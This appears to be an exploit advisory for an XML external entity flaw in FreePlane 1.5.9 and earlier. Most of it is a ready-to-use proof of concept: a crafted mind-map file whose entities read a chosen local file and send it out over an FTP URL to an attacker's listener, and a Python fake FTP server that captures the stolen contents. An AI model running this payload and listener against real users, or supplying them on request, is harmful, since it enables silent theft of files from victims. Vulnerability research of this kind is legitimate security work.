
FreePlane <= 1.5.9 XXE

What is FreePlane?
FreePlane is an open-source, Java-based application for creating mind maps.


Vulnerability description:
FreePlane is a Java-based application that loads its mind maps from plain XML files. The XML parser used to load them expanded external entities declared in the document's DTD, which is what makes the XXE attack possible.

Results:
When the victim opens a maliciously crafted mind map, any file readable by the Java process can be sent to the attacker. The exfiltration is out-of-band: the file's contents are spliced into the URL of a second external entity that points at an attacker-controlled server, so the data leaves the victim's machine as part of that request.

Proof of concept:
Malicious mind map (replace /path/secret_file.txt with the file to steal and 127.0.0.1:2121 with the attacker's FTP listener):

<map version="freeplane 1.5.9">
<!DOCTYPE node [
<!ENTITY % start "<![CDATA[">
<!ENTITY % data SYSTEM "file:////path/secret_file.txt">
<!ENTITY % end "]]>">
<!ENTITY % all "%start;%data;%end;">
<!ENTITY % c "<!ENTITY send SYSTEM 'ftp://127.0.0.1:2121/%all;'>">
%c;
]>
<!--To view this file, download free mind mapping software Freeplane from http://freeplane.sourceforge.net -->
<node TEXT="FreePlane PWNED" FOLDED="false" ID="ID_1702614147" CREATED="1488125426040" MODIFIED="1488125446531" STYLE="oval">
<node TEXT="Test" ID="ID_190033427" CREATED="1488125470150" MODIFIED="1488125471280"/>
<node TEXT="Test" ID="ID_935990512" CREATED="1488125471478" MODIFIED="1488125473816"/>
</node>
<node>&send;</node>
</map>

Simple FTP server. An FTP URL is used rather than HTTP because Java's ftp:// handler sends the URL path to the server as a series of CWD commands followed by a RETR, so the leaked file contents (including newlines, which would break an HTTP request line) arrive in those commands. The server only needs to answer with success codes to keep the client talking and print what it receives:

#!/usr/bin/env python
# Minimal fake FTP server: it accepts whatever Java's ftp:// URL handler sends
# and prints the path segments (CWD) and file name (RETR), which is where the
# leaked file content arrives.
from __future__ import print_function
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('127.0.0.1', 2121))
s.listen(1)
print('XXE-FTP listening')
conn, addr = s.accept()
conn.sendall('220 Staal XXE-FTP\r\n'.encode())
stop = False
while not stop:
    # decode() instead of str(): under Python 3, str(bytes) yields "b'...'",
    # which would make the startswith() checks below never match
    dp = conn.recv(1024).decode('latin-1')
    if not dp:          # client closed the connection
        break
    if dp.find("USER") > -1:
        conn.sendall("331 password please - version check\r\n".encode())
    else:
        # answer everything else with a success code so the client keeps going
        conn.sendall("230 more data please!\r\n".encode())
    if dp.startswith("RETR") or dp.startswith("QUIT"):
        stop = True
    if dp.find("CWD") > -1:
        # each directory segment of the URL path arrives as its own CWD;
        # print them joined with '/' to reassemble the leaked data
        print(dp.replace('CWD ', '/', 1).replace('\r\n', ''), end='')
    if dp.find("RETR") > -1:
        # the last path segment is requested with RETR
        print(dp.replace("RETR", '\033[92m[*] RECEIVED DATA\033[0m\r\n', 1))

conn.close()
s.close()

References:
CVE-2018-1000069
OWASP Top 10 (2017), A4: XML External Entities (XXE)